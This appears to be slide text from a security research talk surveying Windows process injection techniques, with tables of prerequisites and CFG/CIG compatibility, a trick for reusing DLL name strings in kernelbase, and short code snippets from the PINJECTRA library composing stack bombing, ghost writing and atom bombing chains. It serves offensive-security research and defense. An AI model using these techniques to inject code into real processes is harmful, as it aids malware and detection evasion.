  • 44. Writing techniques Write Tech. Prerequisites Address control WriteProcessMemory (none) Full Existing Shared Memory Process has RW shared memory (none) Atom Bombing (APC) Thread in alertable state Full NtMapViewOfSection Target address is unallocated Full memset/memmove (APC) Thread in alertable state Full
  • 45. Execution techniques Execution Tech. Family Prerequisites CFG/CIG DLL injection via CreateRemoteThread DLL injection DLL on disk; loader lock CIG requires MSFT signed DLL CreateRemoteThread (none) Target must be CFG-valid APC Thread in alertable state Target must be CFG-valid Thread execution hijacking (SIR) (none) (none) Windows hook DLL injection DLL on disk; target loads user32.dll CIG requires MSFT signed DLL
  • 46. (contd.) Execution Tech. Family Prerequisites CFG/CIG Ghost-writing (none) (none) SetWindowLongPtr Callback override Extra windows bytes is a pointer to an object with a virtual table Target must be CFG-valid Unmap+overwrite (none) (none) PROPagate Callback override Process has subclassed window Target must be CFG-valid
  • 47. (contd.) Execution Tech. Family Prerequisites CFG/CIG Kernel Callback Table Callback override Process must own a window Target must be CFG-valid Ctrl-Inject Callback override Console app. Target must be CFG-valid Service Control Callback override Service Target must be CFG-valid USERDATA Callback override Console app. Target must be CFG-valid ALPC callback Callback override Open ALPC port Target must be CFG-valid
  • 48. (contd.) Execution Tech. Family Prerequisites CFG/CIG WNF callback Callback override Process must use WNF Target must be CFG-valid Shatter-style: WordWarping, Hyphentension, AutoCourgette(?), Streamception, Oleum Callback override window with RichEdit control Target must be CFG-valid Shatter-style: Listplanting, Treepoline Callback override window with ListView control Target must be CFG-valid
  • 49. (contd.) Execution Tech. Family Prerequisites CFG/CIG Stack Bombing (thread in alertable state) (none)
  • 50. Bonus: System DLL names for free • So you want to force loading a system DLL to a target process? • Maybe your favorite ROP gadget is there • e.g. QueueUserAPC(LoadLibraryA, thread, ptr to DLL name) • And you won’t/can’t write its name to the target process • Maybe you can’t use a memory writing technique • But the system DLL name is already there! • Kernelbase contains a list of 1000+ system DLL names • In Kernelbase!g_DllMap+8 there is a pointer to an array of structures, each one 3 QWORDs, where the first QWORD is a pointer to a system DLL name (ASCII, NUL- terminated), in kernelbase’s .rdata section. For example:
  • 51. Meet PINJECTRA • Version: 1.0 (Initial release) • Programming Language: C/C++ • License: 3-Clause BSD • URL: https://github.com/SafeBreach-Labs/pinjectra
  • 52. PINJECTRA -- High Level Overview • Visual Studio Solution that contains 4 Projects: • MsgBoxOnGetMsgProc ← DLL Artifact • MsgBoxOnProcessAttach ← DLL Artifact • Pinjectra ← Techniques & Demo Program • TestProcess ← Dummy Testing Program • Utilizes C/C++ static type system to provide a mix & match experience to rapid develop new process injection techniques, as well as to experiment with already- existing one
  • 53. Stack Bombing Impl. in PINJECTRA: e = new CodeViaThreadSuspendInjectAndResume_Complex( new NtQueueApcThread_WITH_memset( new _ROP_CHAIN_1() ) ); e->inject(pid, tid);
  • 55. Ghost Writing Impl. in PINJECTRA: e = new CodeViaThreadSuspendInjectAndResume_ChangeRspChangeRip_Complex( new GhostWriting( new _ROP_CHAIN_2() ) ); e->inject(pid, tid);
  • 57. UnmapMap Impl. in PINJECTRA: e = new CodeViaProcessSuspendInjectAndResume_Complex( new CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection( new _PAYLOAD_5() ) ); e->inject(pid, tid);
  • 59. SetWindowLongPtr Impl. in PINJECTRA: e = new CodeViaSetWindowLongPtrA( new ComplexToMutableAdvanceMemoryWriter( new _PAYLOAD_4() , new VirtualAllocEx_WriteProcessMemory( NULL, 0, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) ) ); e->inject(pid, tid);
  • 61. Atom Bombing Impl. in PINJECTRA: e = new CodeViaQueueUserAPC( new OpenThread_OpenProcess_VirtualAllocEx_GlobalAddAtomA( _gen_payload_2(), PAYLOAD3_SIZE, PROCESS_ALL_ACCESS, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE) ); e->inject(pid, tid);
  • 63. Summary (sound-bytes) • We map the vast territory of “true” process injection, and provide an analysis and a comparison in a single collection/repository • We provide a library (PINJECTRA) for mix-and-match generation of process injection attacks • We describe a new CFG-agnostic execution technique – stack bombing (and a memory writing technique – memset/memmove over APC)